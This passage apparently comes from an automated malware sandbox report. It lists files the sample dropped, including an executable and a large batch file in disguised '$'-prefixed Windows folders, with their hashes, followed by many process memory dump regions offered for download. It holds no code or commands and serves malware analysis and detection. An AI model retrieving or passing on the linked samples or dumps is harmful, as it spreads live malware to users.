                                                                                                                                    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                    SHA512

                                                                                                                                    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                    Download Submit

                                                                                                                                  • C:\Windows\$nya-onimai2\hlPFLa.exe
                                                                                                                                    Filesize

                                                                                                                                    36KB

                                                                                                                                    MD5

                                                                                                                                    b943a57bdf1bbd9c33ab0d33ff885983

                                                                                                                                    SHA1

                                                                                                                                    1cee65eea1ab27eae9108c081e18a50678bd5cdc

                                                                                                                                    SHA256

                                                                                                                                    878df6f755578e2e79d0e6fd350f5b4430e0e42bb4bc8757afb97999bc405ba4

                                                                                                                                    SHA512

                                                                                                                                    cb7253de88bd351f8bcb5dc0b5760d3d2875d39f601396a4250e06ead9e7edeffcd94fa23f392833f450c983a246952f2bad3a40f84aff2adc0f7d0eb408d03c

                                                                                                                                    Download Submit

                                                                                                                                  • C:\Windows\$rbx-onimai2\$rbx-CO2.bat
                                                                                                                                    Filesize

                                                                                                                                    7.2MB

                                                                                                                                    MD5

                                                                                                                                    b052451fc18d2a15c1d83312b55d09a3

                                                                                                                                    SHA1

                                                                                                                                    81ed7f80a894ceaca01153920d3b5e73f593d6a5

                                                                                                                                    SHA256

                                                                                                                                    adf4074b727b1f4914e3d1bd154f5d8672d16688960a77d4262e2c620cf7f890

                                                                                                                                    SHA512

                                                                                                                                    9102cea466aa291c2df1a4f2d69d4cfe71ef7c7dd048f17719757ed317e80b192337894d59c04fdb95c9c92fc1b0568f2049960ee927bc66d6b421e089a8a659

                                                                                                                                    Download Submit

                                                                                                                                  • memory/396-79-0x000002987CBE0000-0x000002987CC0A000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    168KB

                                                                                                                                    Download

                                                                                                                                  • memory/640-43-0x0000022B81780000-0x0000022B817AA000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    168KB

                                                                                                                                    Download

                                                                                                                                  • memory/640-33-0x0000022B81780000-0x0000022B817AA000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    168KB

                                                                                                                                    Download

                                                                                                                                  • memory/640-39-0x0000022B81780000-0x0000022B817AA000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    168KB

                                                                                                                                    Download

                                                                                                                                  • memory/640-40-0x0000022B81780000-0x0000022B817AA000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    168KB

                                                                                                                                    Download

                                                                                                                                  • memory/640-41-0x0000022B81780000-0x0000022B817AA000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    168KB

                                                                                                                                    Download

                                                                                                                                  • memory/640-42-0x0000022B81780000-0x0000022B817AA000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    168KB

                                                                                                                                    Download

                                                                                                                                  • memory/640-32-0x0000022B81750000-0x0000022B81774000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    144KB

                                                                                                                                    Download

                                                                                                                                  • memory/640-44-0x00007FFA996D0000-0x00007FFA996E0000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    64KB

                                                                                                                                    Download

                                                                                                                                  • memory/640-45-0x0000022B81780000-0x0000022B817AA000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    168KB

                                                                                                                                    Download

                                                                                                                                  • memory/640-34-0x0000022B81780000-0x0000022B817AA000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    168KB

                                                                                                                                    Download

                                                                                                                                  • memory/696-55-0x00000185E5250000-0x00000185E527A000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    168KB

                                                                                                                                    Download

                                                                                                                                  • memory/696-57-0x00000185E5250000-0x00000185E527A000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    168KB

                                                                                                                                    Download

                                                                                                                                  • memory/696-58-0x00000185E5250000-0x00000185E527A000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    168KB

                                                                                                                                    Download

                                                                                                                                  • memory/696-59-0x00007FFA996D0000-0x00007FFA996E0000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    64KB

                                                                                                                                    Download

                                                                                                                                  • memory/696-56-0x00000185E5250000-0x00000185E527A000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    168KB

                                                                                                                                    Download

                                                                                                                                  • memory/696-54-0x00000185E5250000-0x00000185E527A000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    168KB

                                                                                                                                    Download

                                                                                                                                  • memory/696-49-0x00000185E5250000-0x00000185E527A000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    168KB

                                                                                                                                    Download

                                                                                                                                  • memory/696-60-0x00000185E5250000-0x00000185E527A000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    168KB

                                                                                                                                    Download

                                                                                                                                  • memory/1000-70-0x000001C14D770000-0x000001C14D79A000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    168KB

                                                                                                                                    Download

                                                                                                                                  • memory/1000-75-0x000001C14D770000-0x000001C14D79A000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    168KB

                                                                                                                                    Download

                                                                                                                                  • memory/1000-74-0x00007FFA996D0000-0x00007FFA996E0000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    64KB

                                                                                                                                    Download

                                                                                                                                  • memory/1000-73-0x000001C14D770000-0x000001C14D79A000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    168KB

                                                                                                                                    Download

                                                                                                                                  • memory/1000-72-0x000001C14D770000-0x000001C14D79A000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    168KB

                                                                                                                                    Download

                                                                                                                                  • memory/1000-71-0x000001C14D770000-0x000001C14D79A000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    168KB

                                                                                                                                    Download

                                                                                                                                  • memory/1000-69-0x000001C14D770000-0x000001C14D79A000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    168KB

                                                                                                                                    Download

                                                                                                                                  • memory/1000-64-0x000001C14D770000-0x000001C14D79A000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    168KB

                                                                                                                                    Download

                                                                                                                                  • memory/2192-2431-0x000001D652FD0000-0x000001D652FDE000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    56KB

                                                                                                                                    Download

                                                                                                                                  • memory/2576-1096-0x00007FFAB8833000-0x00007FFAB8835000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    8KB

                                                                                                                                    Download

                                                                                                                                  • memory/2576-191-0x0000021FFBBB0000-0x0000021FFBF22000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    3.4MB

                                                                                                                                    Download

                                                                                                                                  • memory/2576-0-0x00007FFAB8833000-0x00007FFAB8835000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    8KB

                                                                                                                                    Download

                                                                                                                                  • memory/2576-9-0x0000021FFAE10000-0x0000021FFAE32000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    136KB

                                                                                                                                    Download

                                                                                                                                  • memory/2576-1101-0x00007FFAB8830000-0x00007FFAB92F2000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    10.8MB

                                                                                                                                    Download

                                                                                                                                  • memory/2576-1097-0x00007FFAB8830000-0x00007FFAB92F2000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    10.8MB

                                                                                                                                    Download

                                                                                                                                  • memory/2576-19-0x00007FFAB8830000-0x00007FFAB92F2000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    10.8MB

                                                                                                                                    Download

                                                                                                                                  • memory/2576-10-0x00007FFAB8830000-0x00007FFAB92F2000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    10.8MB

                                                                                                                                    Download

                                                                                                                                  • memory/2576-18-0x00007FFAB8830000-0x00007FFAB92F2000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    10.8MB

                                                                                                                                    Download

                                                                                                                                  • memory/2576-16-0x00007FFAD9640000-0x00007FFAD9849000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    2.0MB

                                                                                                                                    Download

                                                                                                                                  • memory/2576-17-0x00007FFAD89D0000-0x00007FFAD8A8D000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    756KB

                                                                                                                                    Download

                                                                                                                                  • memory/2576-15-0x0000021FFB490000-0x0000021FFB8D6000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    4.3MB

                                                                                                                                    Download

                                                                                                                                  • memory/2576-14-0x0000021FE2A40000-0x0000021FE2A7A000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    232KB

                                                                                                                                    Download

                                                                                                                                  • memory/2576-11-0x00007FFAB8830000-0x00007FFAB92F2000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    10.8MB

                                                                                                                                    Download

                                                                                                                                  • memory/2576-13-0x0000021FFB250000-0x0000021FFB296000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    280KB

                                                                                                                                    Download

                                                                                                                                  • memory/2576-12-0x00007FFAB8830000-0x00007FFAB92F2000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    10.8MB

                                                                                                                                    Download

                                                                                                                                  • memory/3872-27-0x00007FFAD9640000-0x00007FFAD9849000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    2.0MB

                                                                                                                                    Download

                                                                                                                                  • memory/3872-29-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    32KB

                                                                                                                                    Download

                                                                                                                                  • memory/3872-21-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    32KB

                                                                                                                                    Download

                                                                                                                                  • memory/3872-24-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    32KB

                                                                                                                                    Download

                                                                                                                                  • memory/3872-22-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    32KB

                                                                                                                                    Download

                                                                                                                                  • memory/3872-28-0x00007FFAD89D0000-0x00007FFAD8A8D000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    756KB

                                                                                                                                    Download

                                                                                                                                  • memory/3872-20-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    32KB

                                                                                                                                    Download

                                                                                                                                  • memory/3872-26-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    32KB

                                                                                                                                    Download

                                                                                                                                  • memory/4484-1771-0x000002587A8D0000-0x000002587B03E000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    7.4MB

                                                                                                                                    Download

                                                                                                                                  • memory/4484-1925-0x000002587BC00000-0x000002587BDC2000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    1.8MB

                                                                                                                                    Download

                                                                                                                                  • memory/4484-1924-0x000002587B970000-0x000002587BA22000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    712KB

                                                                                                                                    Download

                                                                                                                                  • memory/4484-1923-0x000002587B6E0000-0x000002587B730000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    320KB

                                                                                                                                    Download

                                                                                                                                  • memory/4484-2738-0x000002587B760000-0x000002587B772000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    72KB

                                                                                                                                    Download

                                                                                                                                  • memory/4484-2739-0x000002587BA30000-0x000002587BA6C000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    240KB

                                                                                                                                    Download